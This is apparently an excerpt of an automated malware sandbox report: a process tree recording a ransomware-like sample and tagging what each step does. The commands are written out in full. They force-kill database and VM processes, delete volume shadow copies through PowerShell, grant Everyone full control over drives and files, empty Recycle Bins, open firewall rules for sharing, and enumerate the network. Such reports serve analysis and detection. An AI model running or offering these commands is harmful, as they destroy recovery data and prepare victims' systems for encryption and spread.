C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f3⤵
- Kills process with taskkill
PID:2164
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f3⤵PID:5300
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f3⤵
- Kills process with taskkill
PID:4880
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f3⤵PID:5276
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f3⤵PID:5088
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵PID:5332
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5764
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5208
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5236
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Windows\TEMP\tmp292F.bat3⤵PID:4628
-
C:\Windows\system32\mountvol.exemountvol4⤵PID:4036
-
-
C:\Windows\system32\find.exefind "}\"4⤵PID:2592
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\4⤵PID:6052
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
PID:6040
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\4⤵PID:3576
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
PID:4176
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\4⤵PID:4980
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
PID:4500
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin3⤵PID:5484
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵PID:4244
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:5644
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵PID:4064
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:3396
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵PID:5652
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\1618038130 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5408
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:4416
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:4552
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5740
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5424
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:1072
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:3532
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:3816
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-065959-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:4076
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5304
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:6096
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5364
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵PID:2508
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:2620
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:4240
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:3120
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:4556
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5232
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5536
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:1596
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:4932
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:2504
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:5336
-
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4304